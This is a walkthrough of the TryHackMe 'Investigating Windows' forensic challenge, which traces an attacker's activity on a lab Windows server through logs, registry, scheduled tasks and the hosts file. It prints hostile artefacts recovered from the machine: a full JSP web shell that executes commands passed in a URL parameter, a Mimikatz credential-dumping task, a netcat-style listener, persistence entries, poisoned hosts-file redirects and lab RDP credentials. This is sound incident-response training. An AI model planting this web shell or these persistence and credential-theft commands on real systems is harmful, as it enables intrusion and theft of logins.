Type: Challenge
Difficulty: Easy
Tags: Windows
Meta Tags: Walkthrough, Walk-through, Write-up, Writeup
Subscription type: Free
Description:
A windows machine has been hacked, its your job to go investigate this windows machine
and find clues to what the hacker might have done.
Room link: https://tryhackme.com/r/room/investigatingwindows
We start by connecting via RDP with xfreerdp
┌──(kali㉿kali)-[/mnt/…/TryHackMe/CTFs/Easy/HeartBleed]
└─$ xfreerdp /v:10.10.95.87 /cert:ignore /u:Administrator /p:letmein123! /h:960 /w:1500 +clipboard
[15:04:33:834] [201350:201351] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[15:04:33:834] [201350:201351] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
<---snip--->Next, we open both an elevated command prompt (cmd.exe) window and a PowerShell window.
We can get this information with a combination of systeminfo and findstr in the cmd.exe window
C:\Users\Administrator>systeminfo | findstr /i os
Host Name: EC2AMAZ-I8UHO76
OS Name: Microsoft Windows Server 2016 Datacenter
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
BIOS Version: Amazon EC2 1.0, 10/16/2017
Answer: Windows Server 2016
Hint: That's you just now. But, who logged in before you?
We can get this information with net user in the cmd.exe window.
First we list all local users
C:\Users\Administrator>net user
User accounts for \\EC2AMAZ-I8UHO76
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Jenny John
The command completed successfully.
Then we check each user's last logon time like this
C:\Users\Administrator>net user john
User name John
Full Name John
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/2/2019 5:48:19 PM
Password expires Never
Password changeable 3/2/2019 5:48:19 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/2/2019 5:48:32 PM <------ Here !
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Alternatively, we can check the security event log for event IDs 4624 (An account was successfully logged on) with Get-EventLog and Select-Object in the PowerShell window
PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{Logname='Security';ID=4624} -MaxEvents 10 | Select-Object @{N='User'; E={$_.Properties[5].Value}}, TimeCreated
User TimeCreated
---- -----------
SYSTEM 9/14/2024 1:13:01 PM
SYSTEM 9/14/2024 1:11:45 PM
Administrator 9/14/2024 1:04:34 PM <-------- Here!
DWM-3 9/14/2024 1:04:34 PM
DWM-3 9/14/2024 1:04:34 PM
Administrator 9/14/2024 1:04:32 PM
Administrator 9/14/2024 12:59:32 PM
DWM-3 9/14/2024 12:59:32 PM
DWM-3 9/14/2024 12:59:32 PM
SYSTEM 9/14/2024 12:51:18 PMAnswer: Administrator
Answer format: MM/DD/YYYY H:MM:SS AM/PM
Hint: Try using cmd to find this out. Please keep the answer format in mind before giving the answer.
We have already seen this in question #2
C:\Users\Administrator>net user john
User name John
Full Name John
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/2/2019 5:48:19 PM
Password expires Never
Password changeable 3/2/2019 5:48:19 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/2/2019 5:48:32 PM <------ Here !
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Answer: 03/02/2019 5:48:32 PM
We can see this in the autostart Run registry key.
Check from cmd.exe
C:\Users\Administrator>reg.exe QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
UpdateSvc REG_SZ C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt
Or check from PowerShell
PS C:\Users\Administrator> Get-Item "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
Name Property
---- --------
Run UpdateSvc : C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txtAnswer: 10.34.2.3
We can start by checking what users are currently in the local Administrators group
C:\Users\Administrator>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Guest
Jenny
The command completed successfully.
Answer: Guest, Jenny
We can check scheduled tasks with the schtasks command
C:\Users\Administrator> schtasks
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Amazon Ec2 Launch - Instance Initializat N/A Disabled
check logged in 9/14/2024 4:59:43 PM Ready
Clean file system 9/14/2024 4:55:17 PM Ready
falshupdate22 9/14/2024 2:19:04 PM Ready
GameOver 9/14/2024 2:22:00 PM Ready
update windows N/A Ready
Folder: \Microsoft
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks presently available at your access level.
<---snip--->The list is quite long but we can start checking tasks in the root folder.
This task certainly looks suspicious
C:\Users\Administrator> schtasks /Query /TN "Clean file system" /V /FO LIST
Folder: \
HostName: EC2AMAZ-I8UHO76
TaskName: \Clean file system
Next Run Time: 9/19/2021 4:55:17 PM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 9/19/2021 6:37:36 AM
Last Result: -2147020576
Author: EC2AMAZ-I8UHO76\Administrator
Task To Run: C:\TMP\nc.ps1 -l 1348 <----------- Here !
Start In: N/A
Comment: A task to clean old files of the system
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 4:55:17 PM
Start Date: 3/2/2019
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledThe tool running is powercat - a netcat clone in PowerShell.
Answer: Clean file system
See the schtasks listing above and the Task To Run line.
Answer: nc.ps1
See the schtasks listing above and the Task To Run line.
Answer: 1348
As before, we use net user to find this out.
C:\Users\Administrator> net user jenny
User name Jenny
Full Name Jenny
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/2/2019 4:52:25 PM
Password expires Never
Password changeable 3/2/2019 4:52:25 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.Answer: Never
See the schtasks listing above and the Start Date line.
Answer: 03/02/2019
Answer format: MM/DD/YYYY HH:MM:SS AM/PM
Hint: 00/00/0000 0:00:49 PM
We check the security event log for event IDs 4672 (Special privileges assigned to new logon) with Get-EventLog in the PowerShell window
PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 25 -Oldest
ProviderName: Microsoft-Windows-Security-Auditing
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
2/13/2019 8:14:30 AM 4672 Information Special privileges assigned to new logon....
2/13/2019 8:14:31 AM 4672 Information Special privileges assigned to new logon....
2/13/2019 8:14:31 AM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:58 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:58 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:59 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:59 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:59 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:59 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:02:59 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:03:00 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:03:04 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:03:07 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:03:07 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:03:07 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:38 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:39 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:40 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:49 PM 4672 Information Special privileges assigned to new logon....
3/2/2019 4:04:52 PM 4672 Information Special privileges assigned to new logon....From the hint we see that the answer is the event with a timestamp ending in :49 seconds.
Answer: 03/02/2019 4:04:49 PM
This schedule task runs the password dumping tool
C:\Users\Administrator> schtasks /Query /TN "GameOver" /V /FO LIST
Folder: \
HostName: EC2AMAZ-I8UHO76
TaskName: \GameOver
Next Run Time: 9/19/2021 7:12:00 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 9/19/2021 7:07:00 AM
Last Result: 0
Author: EC2AMAZ-I8UHO76\Administrator
Task To Run: C:\TMP\mim.exe sekurlsa::LogonPasswords > C:\TMP\o.txt
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 4:47:00 PM
Start Date: 3/2/2019
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 5 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledIf you don't recognize the tool and it's syntax you may need to do some additional Googling.
Or check the contents of the file C:\TMP\mim-out.txt.
Answer: Mimikatz
The answer can be found in the hosts file
C:\Users\Administrator>type c:\Windows\System32\Drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com <-----------
76.32.97.132 www.google.com <-----------
Answer: 76.32.97.132
We check the root folder of IIS
C:\Users\Administrator> dir c:\inetpub\wwwroot
Volume in drive C has no label.
Volume Serial Number is F078-2619
Directory of c:\inetpub\wwwroot
03/02/2019 04:47 PM <DIR> .
03/02/2019 04:47 PM <DIR> ..
03/02/2019 04:37 PM 74,853 b.jsp
03/02/2019 04:37 PM 12,572 shell.gif
03/02/2019 04:37 PM 657 tests.jsp
3 File(s) 88,082 bytes
2 Dir(s) 17,419,202,560 bytes free
And checks the contents of the tests.jsp file
C:\Users\Administrator> type c:\inetpub\wwwroot\tests.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>Answer: .jsp
Hint: Firewall
From the hint we see that the answer is Firewall-related.
Let's launch the Windows Firewall with Advanced Security GUI, select Inbound Rules, and sort by the Local Port
Answer: 1337
We have already seen this in the hosts file. See above.
Answer: google.com
For additional information, please see the references below.
- EID 4624 - An account was successfully logged on
- EID 4672 - Special privileges assigned to new logon
- findstr - Microsoft Learn
- Get-EventLog - Microsoft Learn
- Get-Item - Microsoft Learn
- Internet Information Services - Wikipedia
- Mimikatz - Github
- Mimikatz - MITRE ATT&CK
- Mimikatz - Wiki
- Net user - Microsoft Learn
- powercat - GitHub
- reg query - Microsoft Learn
- Registry Run Keys / Startup Folder - MITRE ATT&CK
- Remote Desktop Protocol - Wikipedia
- Scheduled Task - MITRE ATT&CK
- schtasks - Microsoft Learn
- systeminfo - Microsoft Learn
- xfreerdp - Linux manual page
